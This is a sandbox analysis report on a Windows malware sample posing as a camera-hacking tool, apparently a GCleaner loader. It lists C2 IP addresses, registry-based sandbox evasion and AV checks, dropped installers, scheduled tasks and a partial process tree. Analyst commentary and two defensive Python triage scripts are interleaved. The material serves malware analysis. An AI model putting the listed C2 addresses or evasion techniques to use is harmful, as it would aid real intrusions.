Analysis

max time kernel: 112s
max time network: 113s
platform: windows10-2004_x64
resource: win10v2004-20230221-en
resource tags: arch:x64, arch:x86, image:win10v2004-20230221-en, locale:en-us, os:windows10-2004-x64, system
submitted: 29-03-2023 19:27

Static task: static1
Behavioral task: behavioral1
Sample: vzlom-kamer-by-neit_wcEYk7hQ.exe
Resource: win7-20230220-en

General

Target: vzlom-kamer-by-neit_wcEYk7hQ.exe
Size: 4.5MB
MD5: fe0f3853a9f25f71af7a13b313d8521b
SHA1: d868f1263393e0440605abe012e6a7626b12bca9
SHA256: b89f3ebe1ac94726b821a3c23464236586364d2756881a32bef853e7183739ab
SHA512: ea878fd94bee5aa1bc77e64fa6350e6ddcb2d88c32e341ab320701af1feefd424167a46f863c5d1c5226448fe8539f4c8f76e76b6ec49ee2674438ac0bea7a76
SSDEEP: 98304:nP4tWsF8pOX+Q9WZps5699OChBZ/MrbmY2NTeM6T/Mn:P4tWsFNX+9I61hBZ8bm9TW/Mn
Malware Config

Extracted family: gcleaner
C2:
- 85.31.45.39
- 85.31.45.250
- 85.31.45.251
- 85.31.45.88
Signatures

Downloads MZ/PE file
Checks BIOS information in registry (2 TTPs, 1 IoC)
BIOS information is often read in order to detect sandboxing environments.
Processes:
- 71r9O7Y9zIfGXmeBiL.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
Checks computer location settings (2 TTPs, 2 IoCs)
Looks up the country code configured in the registry, likely a geofence.
Processes:
- 71r9O7Y9zIfGXmeBiL.exe: Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation
- FileDate329.exe: Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation
Executes dropped EXE (12 IoCs)
Processes (pid, image):
- 4500 is-75BBU.tmp
- 4668 IC329.exe
- 2144 IC329.exe
- 3372 vzlom_kamer_by_neit.rar_id25861706.exe
- 2772 DMfcPC.exe
- 3124 71r9O7Y9zIfGXmeBiL.exe
- 4036 is-LA33S.tmp
- 3448 FileDate329.exe
- 2396 9nx2u.exe
- 2236 is-GRU8E.tmp
- 4952 SyncBackupShell.exe
- 820 kSdbFaL.exe
Loads dropped DLL (7 IoCs)
Processes (pid, image):
- 4500 is-75BBU.tmp
- 4036 is-LA33S.tmp (3 entries)
- 2236 is-GRU8E.tmp (3 entries)
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials.
Checks for any installed AV software in registry (1 TTP, 4 IoCs)
Processes:
- IC329.exe: Key opened \REGISTRY\MACHINE\SOFTWARE\Avira\AntiVir Desktop\Build
- IC329.exe: Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Avira\AntiVir Desktop\Build
- IC329.exe: Key opened \REGISTRY\MACHINE\SOFTWARE\Avira\AntiVir Desktop
- IC329.exe: Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Avira\AntiVir Desktop
Checks installed software on the system (1 TTP)
Looks up Uninstall key entries in the registry to enumerate software on the system.
Writes to the Master Boot Record (MBR) (1 TTP, 1 IoC)
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
- vzlom_kamer_by_neit.rar_id25861706.exe: File opened for modification \??\PhysicalDrive0
The only IoC is a handle to the raw disk opened with write access; the report does not show a write to sector 0. Opening \??\PhysicalDrive0 is also how samples read disk identifiers for VM detection, so confirm an actual MBR change (compare the first 512 bytes of the disk before and after the run) before classifying this as a bootkit.
Drops file in System32 directory (6 IoCs)
Processes:
- 71r9O7Y9zIfGXmeBiL.exe: File created C:\Windows\system32\GroupPolicy\gpt.ini
- powershell.exe: File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
- powershell.exe: File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
- powershell.exe: File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
- kSdbFaL.exe: File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol
- kSdbFaL.exe: File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini
Two things stand out here. The systemprofile paths show that the 32-bit powershell.exe instances ran under the LocalSystem profile, not the Admin user. And gpt.ini plus GroupPolicy\Machine\Registry.pol are the files that make up a local machine group policy; the report does not show which settings were written, so the Registry.pol contents should be examined to learn what policy the sample applied.
Drops file in Program Files directory (56 IoCs)
The is-XXXXX.tmp file names and the /SL4 switches in the process tree are Inno Setup installer conventions: is-75BBU.tmp installs ImageComparer and is-GRU8E.tmp installs BKngBackup; the installed SyncBackupShell.exe then creates C:\Program Files (x86)\clFlow.
Processes:
- is-75BBU.tmp: File created C:\Program Files (x86)\ImageComparer\is-59ERO.tmp
- is-75BBU.tmp: File created C:\Program Files (x86)\ImageComparer\languages\is-JVMH1.tmp
- is-75BBU.tmp: File created C:\Program Files (x86)\ImageComparer\is-NFTTB.tmp
- is-75BBU.tmp: File created C:\Program Files (x86)\ImageComparer\is-02UP6.tmp
- is-75BBU.tmp: File created C:\Program Files (x86)\ImageComparer\languages\is-3HKL3.tmp
- is-75BBU.tmp: File created C:\Program Files (x86)\ImageComparer\is-B2520.tmp
- is-75BBU.tmp: File created C:\Program Files (x86)\ImageComparer\is-3E878.tmp
- is-75BBU.tmp: File created C:\Program Files (x86)\ImageComparer\languages\is-FM8N5.tmp
- is-75BBU.tmp: File created C:\Program Files (x86)\ImageComparer\languages\is-NDHHD.tmp
- is-GRU8E.tmp: File created C:\Program Files (x86)\BKngBackup\Languages\is-KD929.tmp
- is-75BBU.tmp: File opened for modification C:\Program Files (x86)\ImageComparer\unins000.dat
- is-75BBU.tmp: File created C:\Program Files (x86)\ImageComparer\languages\is-OMFNE.tmp
- is-75BBU.tmp: File created C:\Program Files (x86)\ImageComparer\languages\is-1E15F.tmp
- is-75BBU.tmp: File created C:\Program Files (x86)\ImageComparer\languages\is-E5S6K.tmp
- is-75BBU.tmp: File opened for modification C:\Program Files (x86)\ImageComparer\ImageComparer.url
- is-GRU8E.tmp: File created C:\Program Files (x86)\BKngBackup\unins000.dat
- is-GRU8E.tmp: File opened for modification C:\Program Files (x86)\BKngBackup\SyncBackupShell.exe
- is-75BBU.tmp: File created C:\Program Files (x86)\ImageComparer\languages\is-KNL17.tmp
- is-GRU8E.tmp: File created C:\Program Files (x86)\BKngBackup\Help\images\is-2CBSA.tmp
- is-GRU8E.tmp: File created C:\Program Files (x86)\BKngBackup\is-4U2SJ.tmp
- is-GRU8E.tmp: File created C:\Program Files (x86)\BKngBackup\Help\images\is-CVLEC.tmp
- is-75BBU.tmp: File created C:\Program Files (x86)\ImageComparer\languages\is-PQ96C.tmp
- is-75BBU.tmp: File created C:\Program Files (x86)\ImageComparer\languages\is-VIDUL.tmp
- is-75BBU.tmp: File created C:\Program Files (x86)\ImageComparer\is-3AFQR.tmp
- is-GRU8E.tmp: File created C:\Program Files (x86)\BKngBackup\Help\images\is-VOAF7.tmp
- is-GRU8E.tmp: File opened for modification C:\Program Files (x86)\BKngBackup\unins000.dat
- SyncBackupShell.exe: File created C:\Program Files (x86)\clFlow
- is-75BBU.tmp: File created C:\Program Files (x86)\ImageComparer\is-4IIBK.tmp
- is-75BBU.tmp: File created C:\Program Files (x86)\ImageComparer\is-UJJEO.tmp
- is-75BBU.tmp: File created C:\Program Files (x86)\ImageComparer\languages\is-EE50I.tmp
- is-75BBU.tmp: File created C:\Program Files (x86)\ImageComparer\languages\is-RCGCO.tmp
- is-GRU8E.tmp: File created C:\Program Files (x86)\BKngBackup\is-I5LUF.tmp
- is-75BBU.tmp: File created C:\Program Files (x86)\ImageComparer\languages\is-O00K5.tmp
- is-GRU8E.tmp: File created C:\Program Files (x86)\BKngBackup\is-BTL1T.tmp
- is-GRU8E.tmp: File created C:\Program Files (x86)\BKngBackup\is-92OVL.tmp
- is-GRU8E.tmp: File created C:\Program Files (x86)\BKngBackup\is-IGMAP.tmp
- is-GRU8E.tmp: File created C:\Program Files (x86)\BKngBackup\Help\is-917MI.tmp
- is-75BBU.tmp: File created C:\Program Files (x86)\ImageComparer\is-B627N.tmp
- is-75BBU.tmp: File created C:\Program Files (x86)\ImageComparer\languages\is-AAOHE.tmp
- is-75BBU.tmp: File created C:\Program Files (x86)\ImageComparer\languages\is-E1AL8.tmp
- is-75BBU.tmp: File created C:\Program Files (x86)\ImageComparer\languages\is-S6N81.tmp
- is-75BBU.tmp: File created C:\Program Files (x86)\ImageComparer\languages\is-2GHK1.tmp
- is-75BBU.tmp: File created C:\Program Files (x86)\ImageComparer\languages\is-BL8UK.tmp
- is-75BBU.tmp: File created C:\Program Files (x86)\ImageComparer\languages\is-BUJ01.tmp
- is-75BBU.tmp: File created C:\Program Files (x86)\ImageComparer\languages\is-SQQJH.tmp
- is-GRU8E.tmp: File created C:\Program Files (x86)\BKngBackup\is-2IVB9.tmp
- is-75BBU.tmp: File created C:\Program Files (x86)\ImageComparer\unins000.dat
- is-75BBU.tmp: File created C:\Program Files (x86)\ImageComparer\languages\is-I3SP5.tmp
- is-GRU8E.tmp: File created C:\Program Files (x86)\BKngBackup\is-6PB6V.tmp
- is-75BBU.tmp: File created C:\Program Files (x86)\ImageComparer\is-MHHNR.tmp
- is-75BBU.tmp: File created C:\Program Files (x86)\ImageComparer\languages\is-THHLJ.tmp
- is-75BBU.tmp: File created C:\Program Files (x86)\ImageComparer\languages\is-6O37R.tmp
- is-GRU8E.tmp: File created C:\Program Files (x86)\BKngBackup\Help\is-9AAOS.tmp
- is-75BBU.tmp: File created C:\Program Files (x86)\ImageComparer\languages\is-T5AHA.tmp
- is-75BBU.tmp: File opened for modification C:\Program Files (x86)\ImageComparer\IC329.exe
- is-GRU8E.tmp: File created C:\Program Files (x86)\BKngBackup\Help\images\is-FNRT1.tmp
Drops file in Windows directory (1 IoC)
Processes:
- schtasks.exe: File created C:\Windows\Tasks\bIIVPNBwJtQvPFWhKj.job
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Program crash (45 IoCs)
Processes: WerFault.exe (45 instances), every one reporting a crash of IC329.exe
- target pid 4668 (IC329.exe): WerFault.exe pids 4880, 4592, 3360, 1888
- target pid 2144 (IC329.exe): WerFault.exe pids 3124, 4544, 1428, 4608, 3188, 2124, 1768, 3988, 1840, 1980, 4480, 4296, 2820, 2808, 2932, 2148, 4152, 552, 4608, 4712, 2608, 2128, 4532, 2236, 3344, 3216, 1980, 652, 4104, 3520, 516, 2864, 2952, 2132, 4296, 4856, 4708, 3188, 792, 4256, 2896
Pids are reused during the run: 3124 and 2236 appear here as WerFault.exe but elsewhere in the report as 71r9O7Y9zIfGXmeBiL.exe and is-GRU8E.tmp, so correlate events by pid and time rather than by pid alone.
Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
SCSI information is often read in order to detect sandboxing environments.
Processes:
- taskmgr.exe: Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000
- taskmgr.exe: Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A
- taskmgr.exe: Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName
All three reads come from taskmgr.exe (pid 3524), which does not appear as a child of the sample in the WriteProcessMemory records; Task Manager reads disk friendly names for its Performance view, so this signature is most likely noise from the interactive session rather than evasion by the sample.
Creates scheduled task(s) (1 TTP, 3 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes (pid, image):
- 1124 schtasks.exe
- 1552 schtasks.exe
- 3244 schtasks.exe
Enumerates system info in registry (2 TTPs, 2 IoCs)
Processes:
- 71r9O7Y9zIfGXmeBiL.exe: Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS
- 71r9O7Y9zIfGXmeBiL.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName
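The registry signatures above (BIOS, computer location, installed AV, SCSI, system info) all list records in the same "<action> <key path> <process>" form, and the interesting question is which process touched which class of key. The Python script below is an added example, not part of the sandbox's output: it parses that record shape, tags each record with a category and an ATT&CK technique chosen here, and separates two kinds of noise from the checks made by the dropped executables. The sample lines are a constructed excerpt copied from the signatures above; the rule list, the vendor names other than Avira, and the assumption that taskmgr.exe is the analyst's own Task Manager are mine.

```python
"""Classify registry-access IoCs from a sandbox report.

Added example, not part of the report. Records have the report's own shape,
"<action> <key path> <process>"; image names never contain spaces but key paths
can ("AntiVir Desktop"), so the last whitespace-delimited token is the process.
"""
import re
from collections import defaultdict

# Constructed excerpt of records taken from the signatures above.
SAMPLE_IOCS = r"""
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 71r9O7Y9zIfGXmeBiL.exe
Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation FileDate329.exe
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Avira\AntiVir Desktop IC329.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName 71r9O7Y9zIfGXmeBiL.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe
"""

RECORD_RE = re.compile(r"^(Key value queried|Key opened|Key created)\s+(.+?)\s+(\S+)$")

# (category, ATT&CK technique, pattern on the key path); the first matching rule wins.
# Vendor keys other than Avira are illustrative assumptions, not taken from the report.
RULES = [
    ("sandbox-evasion", "T1497.001",
     re.compile(r"\\HARDWARE\\DESCRIPTION\\System\\(SystemBiosVersion|BIOS)|\\Enum\\SCSI\\", re.I)),
    ("geofence", "T1614",
     re.compile(r"\\Control Panel\\International\\Geo\\Nation$", re.I)),
    ("av-discovery", "T1518.001",
     re.compile(r"\\SOFTWARE\\(WOW6432Node\\)?(Avira|ESET|KasperskyLab|McAfee|AVAST Software|AVG)\\", re.I)),
    ("cert-store-noise", "",
     re.compile(r"^\\REGISTRY\\USER\\\.DEFAULT\\Software\\(Policies\\)?Microsoft\\SystemCertificates\\", re.I)),
]
NOISE_CATEGORIES = {"cert-store-noise"}
# Assumption: taskmgr.exe is the analyst's interactive Task Manager, not something the sample started.
INTERACTIVE_PROCESSES = {"taskmgr.exe"}


def parse(text):
    """Yield (action, key, process) for each well-formed record line."""
    for line in text.splitlines():
        m = RECORD_RE.match(line.strip())
        if m:
            yield m.groups()


def classify(text):
    """Tag every record with a category and technique ('uncategorised' when no rule fires)."""
    out = []
    for action, key, process in parse(text):
        category, technique = "uncategorised", ""
        for cat, tech, pattern in RULES:
            if pattern.search(key):
                category, technique = cat, tech
                break
        out.append({"process": process, "action": action, "key": key,
                    "category": category, "technique": technique})
    return out


def summarize(text):
    """Map each process to the set of categories it triggered."""
    summary = defaultdict(set)
    for rec in classify(text):
        summary[rec["process"]].add(rec["category"])
    return dict(summary)


def processes_of_interest(text):
    """Processes with at least one non-noise hit, excluding the analyst's interactive tools."""
    return sorted(proc for proc, cats in summarize(text).items()
                  if proc not in INTERACTIVE_PROCESSES and cats - NOISE_CATEGORIES)


if __name__ == "__main__":
    for rec in classify(SAMPLE_IOCS):
        print(f"{rec['category']:<18} {rec['technique']:<10} {rec['process']:<26} {rec['key']}")
    print("review:", ", ".join(processes_of_interest(SAMPLE_IOCS)))
```

Run against the full report, the same rules put 71r9O7Y9zIfGXmeBiL.exe, FileDate329.exe and IC329.exe on the review list and drop the PowerShell certificate-store keys and the Task Manager SCSI reads, which is the triage a reader otherwise does by eye.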
Kills process with taskkill (1 IoC)
Processes (pid, image):
- 3728 taskkill.exe
Modifies data under HKEY_USERS (64 IoCs)
Processes: powershell.exe (two instances)
All 64 entries are "Key created" under \REGISTRY\USER\.DEFAULT; with duplicates collapsed they cover:
- \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\{CA, Root, SmartCardRoot, trust, TrustedPeople, Disallowed} and, variously, their Certificates, CRLs and CTLs subkeys
- \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\{CA, trust, TrustedPeople, Disallowed} and, variously, their Certificates, CRLs and CTLs subkeys
- \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing
These are the per-profile certificate-store keys that Windows creates the first time a process running under the .DEFAULT profile touches the certificate or WinTrust APIs. They are a side effect of PowerShell running as LocalSystem (matching the systemprofile paths under "Drops file in System32 directory" and consistent with the task created by schtasks.exe), not a deliberate registry change by the sample.
Modifies registry class (1 IoC)
Processes:
- IC329.exe: Key created \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings
Runs net.exe
Suspicious behavior: EnumeratesProcesses (64 IoCs)
Processes (pid, image, number of entries):
- 3524 taskmgr.exe (55)
- 2144 IC329.exe (4)
- 3372 vzlom_kamer_by_neit.rar_id25861706.exe (2)
- 3732 powershell.EXE (3)
Most of these come from taskmgr.exe, whose process list is what Task Manager exists to display; the entries attributable to the sample are the IC329.exe, vzlom_kamer_by_neit.rar_id25861706.exe and powershell.EXE ones.
Suspicious use of AdjustPrivilegeToken (10 IoCs)
Processes (privilege, pid, image):
- SeDebugPrivilege 3524 taskmgr.exe
- SeSystemProfilePrivilege 3524 taskmgr.exe
- SeCreateGlobalPrivilege 3524 taskmgr.exe
- SeDebugPrivilege 3728 taskkill.exe
- SeDebugPrivilege 3732 powershell.EXE
- SeDebugPrivilege 1340 powershell.exe
- SeDebugPrivilege 1036 powershell.exe
- SeDebugPrivilege 720 powershell.EXE
- Token: 33 3524 taskmgr.exe
- SeIncBasePriorityPrivilege 3524 taskmgr.exe
Suspicious use of FindShellTrayWindow (64 IoCs)
Processes (pid, image, number of entries):
- 3524 taskmgr.exe (63)
- 3372 vzlom_kamer_by_neit.rar_id25861706.exe (1)
Suspicious use of SendNotifyMessage (64 IoCs)
Processes (pid, image, number of entries):
- 3524 taskmgr.exe (64)
Suspicious use of SetWindowsHookEx (2 IoCs)
Processes (pid, image, number of entries):
- 3372 vzlom_kamer_by_neit.rar_id25861706.exe (2)
Suspicious use of WriteProcessMemory (64 IoCs)
Processes: vzlom-kamer-by-neit_wcEYk7hQ.exe, is-75BBU.tmp, net.exe, IC329.exe, DMfcPC.exe, is-LA33S.tmp, 9nx2u.exe, 71r9O7Y9zIfGXmeBiL.exe, is-GRU8E.tmp, WerFault.exe, cmd.exe
Each parent-to-child pair is logged three times, which is the normal pattern for the writes a parent makes into a child it has just created; injection would show writes into a process the parent did not create. Collapsed to unique parent -> child edges, in report order:
- 2724 vzlom-kamer-by-neit_wcEYk7hQ.exe -> 4500 is-75BBU.tmp (x3)
- 4500 is-75BBU.tmp -> 1096 net.exe (x3)
- 4500 is-75BBU.tmp -> 4668 IC329.exe (x3)
- 1096 net.exe -> 3756 net1.exe (x3)
- 4500 is-75BBU.tmp -> 1264 net.exe (x3)
- 4500 is-75BBU.tmp -> 2144 IC329.exe (x3)
- 1264 net.exe -> 1684 net1.exe (x3)
- 2144 IC329.exe -> 2772 DMfcPC.exe (x3)
- 2144 IC329.exe -> 3124 71r9O7Y9zIfGXmeBiL.exe (x3)
- 2772 DMfcPC.exe -> 4036 is-LA33S.tmp (x3)
- 4036 is-LA33S.tmp -> 2444 net.exe (x3)
- 4036 is-LA33S.tmp -> 3448 FileDate329.exe (x3)
- 2444 net.exe -> 32 net1.exe (x3)
- 2144 IC329.exe -> 2396 9nx2u.exe (x3)
- 2396 9nx2u.exe -> 2236 is-GRU8E.tmp (x3)
- 3124 71r9O7Y9zIfGXmeBiL.exe -> 2024 WerFault.exe (x3)
- 3124 71r9O7Y9zIfGXmeBiL.exe -> 4708 WerFault.exe (x3)
- 2236 is-GRU8E.tmp -> 4952 SyncBackupShell.exe (x3)
- 2024 WerFault.exe -> 3684 cmd.exe (x3)
- 4708 WerFault.exe -> 4856 WerFault.exe (x3)
- 4856 WerFault.exe -> 3140 reg.exe (x3)
- 3684 cmd.exe -> 3040 WerFault.exe (x1; the list is capped at 64 entries)
The last few edges deserve attention: WerFault.exe (2024) starting cmd.exe, WerFault.exe (4856) starting reg.exe, and cmd.exe starting WerFault.exe are not normal error-reporting behaviour. Either those pids were reused by other images or the process name is a masquerade, so verify these entries against the full process tree before drawing conclusions.
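The WriteProcessMemory records above carry enough information to rebuild the process tree without the rest of the report, provided the triplicated entries are collapsed. The Python script below is an added example, not part of the sandbox's output: it parses records in the report's own "PID <parent> wrote to memory of <child> <parent> <parent image> <child image>" form, de-duplicates the pairs, renders the tree, and flags children that a process named WerFault.exe should not have. The sample lines are a constructed excerpt of the records above (the first two edges keep their three repeats, the rest are shown once); the WerFault heuristic is mine.

```python
"""Rebuild a process tree from a sandbox report's WriteProcessMemory records.

Added example, not part of the report. A parent writing into a process it has
just created is expected (CreateProcess does it), and the report lists each such
pair three times; this de-duplicates the pairs and renders the resulting tree.
"""
import re
from collections import defaultdict

# Constructed excerpt of the report's records.
SAMPLE_RECORDS = """
PID 2724 wrote to memory of 4500 2724 vzlom-kamer-by-neit_wcEYk7hQ.exe is-75BBU.tmp
PID 2724 wrote to memory of 4500 2724 vzlom-kamer-by-neit_wcEYk7hQ.exe is-75BBU.tmp
PID 2724 wrote to memory of 4500 2724 vzlom-kamer-by-neit_wcEYk7hQ.exe is-75BBU.tmp
PID 4500 wrote to memory of 2144 4500 is-75BBU.tmp IC329.exe
PID 4500 wrote to memory of 2144 4500 is-75BBU.tmp IC329.exe
PID 4500 wrote to memory of 2144 4500 is-75BBU.tmp IC329.exe
PID 2144 wrote to memory of 2772 2144 IC329.exe DMfcPC.exe
PID 2144 wrote to memory of 3124 2144 IC329.exe 71r9O7Y9zIfGXmeBiL.exe
PID 2144 wrote to memory of 2396 2144 IC329.exe 9nx2u.exe
PID 2396 wrote to memory of 2236 2396 9nx2u.exe is-GRU8E.tmp
PID 2236 wrote to memory of 4952 2236 is-GRU8E.tmp SyncBackupShell.exe
PID 3124 wrote to memory of 2024 3124 71r9O7Y9zIfGXmeBiL.exe WerFault.exe
PID 2024 wrote to memory of 3684 2024 WerFault.exe cmd.exe
PID 3684 wrote to memory of 3040 3684 cmd.exe WerFault.exe
"""

# The parent pid is repeated inside each record; the backreference rejects lines where it is not.
RECORD_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+) \1 (\S+) (\S+)$")

# Heuristic chosen here (an assumption, not from the report): a genuine WerFault.exe
# spawns at most another WerFault.exe or a configured post-mortem debugger, never cmd.exe or reg.exe.
EXPECTED_WERFAULT_CHILDREN = {"werfault.exe"}


def parse_edges(text):
    """Unique (parent_pid, child_pid, parent_image, child_image) tuples in first-seen order."""
    seen, edges = set(), []
    for line in text.splitlines():
        m = RECORD_RE.match(line.strip())
        if not m:
            continue
        edge = (int(m.group(1)), int(m.group(2)), m.group(3), m.group(4))
        if edge not in seen:
            seen.add(edge)
            edges.append(edge)
    return edges


def build_tree(edges):
    """Map pid -> image name and pid -> [child pids] (children in report order)."""
    names, children = {}, defaultdict(list)
    for ppid, cpid, pname, cname in edges:
        names.setdefault(ppid, pname)
        names.setdefault(cpid, cname)
        children[ppid].append(cpid)
    return names, children


def roots(edges):
    """Pids that never appear as a child: the submitted sample(s)."""
    return sorted({e[0] for e in edges} - {e[1] for e in edges})


def render(edges):
    """Indented text tree, two spaces per level, one process per line."""
    names, children = build_tree(edges)
    lines = []

    def walk(pid, depth):
        lines.append(f"{'  ' * depth}{pid} {names[pid]}")
        for child in children.get(pid, []):
            walk(child, depth + 1)

    for root in roots(edges):
        walk(root, 0)
    return "\n".join(lines)


def anomalous_werfault_children(edges):
    """(parent_pid, child_pid, child_image) for WerFault.exe parents with unexpected children."""
    return [(ppid, cpid, cname) for ppid, cpid, pname, cname in edges
            if pname.lower() == "werfault.exe"
            and cname.lower() not in EXPECTED_WERFAULT_CHILDREN]


if __name__ == "__main__":
    edges = parse_edges(SAMPLE_RECORDS)
    print(render(edges))
    for ppid, cpid, cname in anomalous_werfault_children(edges):
        print(f"check: WerFault.exe {ppid} spawned {cname} ({cpid})")
```

On the excerpt the tree has one root (2724, the submitted sample) and the check reports WerFault.exe 2024 spawning cmd.exe; on the full record list it would also report 4856 spawning reg.exe.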
Processes
-
C:\Users\Admin\AppData\Local\Temp\vzlom-kamer-by-neit_wcEYk7hQ.exe"C:\Users\Admin\AppData\Local\Temp\vzlom-kamer-by-neit_wcEYk7hQ.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-0DASG.tmp\is-75BBU.tmp"C:\Users\Admin\AppData\Local\Temp\is-0DASG.tmp\is-75BBU.tmp" /SL4 $80050 "C:\Users\Admin\AppData\Local\Temp\vzlom-kamer-by-neit_wcEYk7hQ.exe" 4446082 532482⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" helpmsg 233⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 helpmsg 234⤵
-
C:\Program Files (x86)\ImageComparer\IC329.exe"C:\Program Files (x86)\ImageComparer\IC329.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 8684⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 8884⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 10404⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 1404⤵
- Program crash
-
C:\Program Files (x86)\ImageComparer\IC329.exe"C:\Program Files (x86)\ImageComparer\IC329.exe" 72aafdade9cba069152144844a0d25e03⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 852 | tree level 4
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 860 | tree level 4
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 872 | tree level 4
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 880 | tree level 4
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1132 | tree level 4
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1172 | tree level 4
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1216 | tree level 4
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1192 | tree level 4
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1200 | tree level 4
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 952 | tree level 4
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1144 | tree level 4
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1620 | tree level 4
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 972 | tree level 4
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1648 | tree level 4
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1676 | tree level 4
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1120 | tree level 4
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1768 | tree level 4
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1712 | tree level 4
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1808 | tree level 4
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1696 | tree level 4
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1772 | tree level 4
- Program crash
-
